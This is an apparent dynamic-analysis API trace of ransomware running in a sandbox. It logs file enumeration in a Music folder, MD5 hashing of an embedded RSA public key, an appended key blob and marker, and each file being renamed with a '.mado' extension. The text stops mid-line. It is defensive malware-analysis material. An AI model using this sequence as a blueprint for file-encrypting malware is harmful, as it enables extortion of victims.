[0204.315] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.315] CloseHandle (hObject=0x63c) returned 1 [0204.321] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6iJpD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6ijpd.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6iJpD.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6ijpd.mp3.mado")) returned 1 [0204.322] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6db4f280, ftCreationTime.dwHighDateTime=0x1d5e26f, ftLastAccessTime.dwLowDateTime=0x3e850f20, ftLastAccessTime.dwHighDateTime=0x1d5e75d, ftLastWriteTime.dwLowDateTime=0x3e850f20, ftLastWriteTime.dwHighDateTime=0x1d5e75d, nFileSizeHigh=0x0, nFileSizeLow=0x167c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7pGOgn9HLFgCIK.m4a", cAlternateFileName="7PGOGN~1.M4A")) returned 1 [0204.323] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7pGOgn9HLFgCIK.m4a") returned=".m4a" [0204.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7pGOgn9HLFgCIK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7pgogn9hlfgcik.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.323] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=92102) returned 1 [0204.323] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.326] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x167a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.326] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.327] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x167c6, lpOverlapped=0x0) returned 1 [0204.328] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.328] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.328] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.328] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.329] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.329] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.329] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.329] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.329] GetLastError () returned 0x0 [0204.329] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.329] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.329] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.329] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.329] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.330] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.330] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x167c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.330] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.330] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.330] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.331] CloseHandle (hObject=0x63c) returned 1 [0204.332] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7pGOgn9HLFgCIK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7pgogn9hlfgcik.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7pGOgn9HLFgCIK.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7pgogn9hlfgcik.m4a.mado")) returned 1 [0204.333] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf629850, ftCreationTime.dwHighDateTime=0x1d5de99, ftLastAccessTime.dwLowDateTime=0xadcb2480, ftLastAccessTime.dwHighDateTime=0x1d5de27, ftLastWriteTime.dwLowDateTime=0xadcb2480, ftLastWriteTime.dwHighDateTime=0x1d5de27, nFileSizeHigh=0x0, nFileSizeLow=0x6a04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8_3qpIVlF3_g4a1.wav", cAlternateFileName="8_3QPI~1.WAV")) returned 1 [0204.333] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8_3qpIVlF3_g4a1.wav") returned=".wav" [0204.333] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8_3qpIVlF3_g4a1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8_3qpivlf3_g4a1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.333] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=27140) returned 1 [0204.334] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.336] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x69de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.336] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.337] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x6a04, lpOverlapped=0x0) returned 1 [0204.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.338] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.339] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.339] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.339] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.339] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.339] GetLastError () returned 0x0 [0204.339] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.339] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.339] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.339] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.339] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.339] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.340] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x6a04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.340] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.340] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.340] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.340] CloseHandle (hObject=0x63c) returned 1 [0204.341] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8_3qpIVlF3_g4a1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8_3qpivlf3_g4a1.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8_3qpIVlF3_g4a1.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8_3qpivlf3_g4a1.wav.mado")) returned 1 [0204.343] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ad6ed0, ftCreationTime.dwHighDateTime=0x1d5df8f, ftLastAccessTime.dwLowDateTime=0x17f23370, ftLastAccessTime.dwHighDateTime=0x1d5e662, ftLastWriteTime.dwLowDateTime=0x17f23370, ftLastWriteTime.dwHighDateTime=0x1d5e662, nFileSizeHigh=0x0, nFileSizeLow=0x8de7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b1mLIXsHukymODHWvE.m4a", cAlternateFileName="B1MLIX~1.M4A")) returned 1 [0204.343] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\b1mLIXsHukymODHWvE.m4a") returned=".m4a" [0204.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\b1mLIXsHukymODHWvE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b1mlixshukymodhwve.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.344] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=36327) returned 1 [0204.344] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.346] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8dc1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.346] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.349] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x8de7, lpOverlapped=0x0) returned 1 [0204.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.350] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0204.351] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.351] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.351] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.351] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.351] GetLastError () returned 0x0 [0204.351] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.351] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0204.351] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.351] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.351] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.351] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.352] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8de7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.352] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.352] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.352] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.352] CloseHandle (hObject=0x63c) returned 1 [0204.353] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\b1mLIXsHukymODHWvE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b1mlixshukymodhwve.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\b1mLIXsHukymODHWvE.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b1mlixshukymodhwve.m4a.mado")) returned 1 [0204.354] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d11f570, ftCreationTime.dwHighDateTime=0x1d5df0b, ftLastAccessTime.dwLowDateTime=0xd98881f0, ftLastAccessTime.dwHighDateTime=0x1d5d92f, ftLastWriteTime.dwLowDateTime=0xd98881f0, ftLastWriteTime.dwHighDateTime=0x1d5d92f, nFileSizeHigh=0x0, nFileSizeLow=0x167ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d6LmHhUS.wav", cAlternateFileName="")) returned 1 [0204.354] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d6LmHhUS.wav") returned=".wav" [0204.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d6LmHhUS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d6lmhhus.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.355] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=92140) returned 1 [0204.355] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.358] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x167c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.358] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.359] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x167ec, lpOverlapped=0x0) returned 1 [0204.360] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.360] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.360] lstrlenA (lpString="-----BEGIN PUBLIC 